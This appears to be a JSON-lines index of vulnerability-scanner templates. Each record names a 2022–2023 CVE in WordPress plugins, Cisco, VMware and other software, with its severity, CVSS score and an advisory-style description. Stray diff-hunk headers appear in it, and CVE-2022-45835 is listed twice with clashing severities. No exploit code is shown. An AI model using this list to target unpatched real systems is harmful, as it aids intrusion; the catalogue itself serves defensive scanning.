{"ID":"CVE-2022-45354","Info":{"Name":"Download Monitor \u003c= 4.7.60 - Sensitive Information Exposure","Severity":"medium","Description":"The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-45354.yaml"}
{"ID":"CVE-2022-45362","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-45362.yaml"}
{"ID":"CVE-2022-45365","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site-Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45365.yaml"}
{"ID":"CVE-2022-45805","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.3 - SQL Injection","Severity":"critical","Description":"WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45805.yaml"}
{"ID":"CVE-2022-45835","Info":{"Name":"WordPress PhonePe Payment Solutions \u003c=1.0.15 - Server-Side Request Forgery","Severity":"medium","Description":"WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-45835.yaml"}
{"ID":"CVE-2022-45835","Info":{"Name":"WordPress PhonePe Payment Solutions \u003c=1.0.15 - Server-Side Request Forgery","Severity":"high","Description":"WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-45835.yaml"}
{"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning \u003c7.16 - Open Redirect","Severity":"medium","Description":"ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45917.yaml"}
{"ID":"CVE-2022-45933","Info":{"Name":"KubeView \u003c=0.1.31 - Information Disclosure","Severity":"critical","Description":"KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45933.yaml"}
{"ID":"CVE-2022-46020","Info":{"Name":"WBCE CMS v1.5.4 - Remote Code Execution","Severity":"critical","Description":"WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46020.yaml"}
@ -1844,43 +1935,58 @@
{"ID":"CVE-2022-46934","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46934.yaml"}
{"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47002.yaml"}
{"ID":"CVE-2022-47003","Info":{"Name":"Mura CMS \u003c10.0.580 - Authentication Bypass","Severity":"critical","Description":"Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47003.yaml"}
{"ID":"CVE-2022-47075","Info":{"Name":"Smart Office Web 20.28 - Information Disclosure","Severity":"high","Description":"An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-47075.yaml"}
{"ID":"CVE-2022-47615","Info":{"Name":"LearnPress Plugin \u003c 4.2.0 - Local File Inclusion","Severity":"critical","Description":"Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin \u003c= 4.1.7.3.2 versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47615.yaml"}
{"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47945.yaml"}
{"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47966.yaml"}
{"ID":"CVE-2022-47986","Info":{"Name":"IBM Aspera Faspex \u003c=4.4.2 PL1 - Remote Code Execution","Severity":"critical","Description":"IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47986.yaml"}
{"ID":"CVE-2022-48012","Info":{"Name":"OpenCATS 0.9.7 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings\u0026a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48012.yaml"}
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
{"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"}
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"}
{"ID":"CVE-2023-0334","Info":{"Name":"ShortPixel Adaptive Images \u003c 3.6.3 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0334.yaml"}
{"ID":"CVE-2023-0448","Info":{"Name":"WP Helper Lite \u003c 4.3 - Cross-Site Scripting","Severity":"medium","Description":"The WP Helper Lite WordPress plugin, in versions \u003c 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0448.yaml"}
{"ID":"CVE-2023-0514","Info":{"Name":"Membership Database \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0514.yaml"}
{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"}
{"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"}
{"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"}
{"ID":"CVE-2023-0563","Info":{"Name":"Bank Locker Management System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-0563.yaml"}
{"ID":"CVE-2023-0600","Info":{"Name":"WP Visitor Statistics (Real Time Traffic) \u003c 6.9 - SQL Injection","Severity":"critical","Description":"The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0600.yaml"}
{"ID":"CVE-2023-0602","Info":{"Name":"Twittee Text Tweet \u003c= 1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0602.yaml"}
{"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"}
{"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"}
{"ID":"CVE-2023-0777","Info":{"Name":"modoboa 2.0.4 - Admin TakeOver","Severity":"critical","Description":"Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0777.yaml"}
{"ID":"CVE-2023-0900","Info":{"Name":"AP Pricing Tables Lite \u003c= 1.1.6 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0900.yaml"}
{"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"}
{"ID":"CVE-2023-0947","Info":{"Name":"Flatpress \u003c 1.3 - Path Traversal","Severity":"critical","Description":"Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0947.yaml"}
{"ID":"CVE-2023-0948","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0948.yaml"}
{"ID":"CVE-2023-0968","Info":{"Name":"WordPress Watu Quiz \u003c3.3.9.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0968.yaml"}
{"ID":"CVE-2023-1020","Info":{"Name":"Steveas WP Live Chat Shoutbox \u003c= 1.4.2 - SQL Injection","Severity":"critical","Description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1020.yaml"}
{"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"}
{"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"}
{"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"}
{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"}
{"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"}
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
{"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"}
{"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"}
{"ID":"CVE-2023-1546","Info":{"Name":"MyCryptoCheckout \u003c 2.124 - Cross-Site Scripting","Severity":"medium","Description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1546.yaml"}
{"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"}
{"ID":"CVE-2023-1698","Info":{"Name":"WAGO - Remote Command Execution","Severity":"critical","Description":"In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1698.yaml"}
{"ID":"CVE-2023-1719","Info":{"Name":"Bitrix Component - Cross-Site Scripting","Severity":"critical","Description":"Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1719.yaml"}
{"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"}
{"ID":"CVE-2023-1780","Info":{"Name":"Companion Sitemap Generator \u003c 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1780.yaml"}
{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
{"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"}
{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"}
{"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"}
{"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"}
{"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"}
{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
{"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"}
@ -1889,9 +1995,14 @@
{"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"}
{"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"}
{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
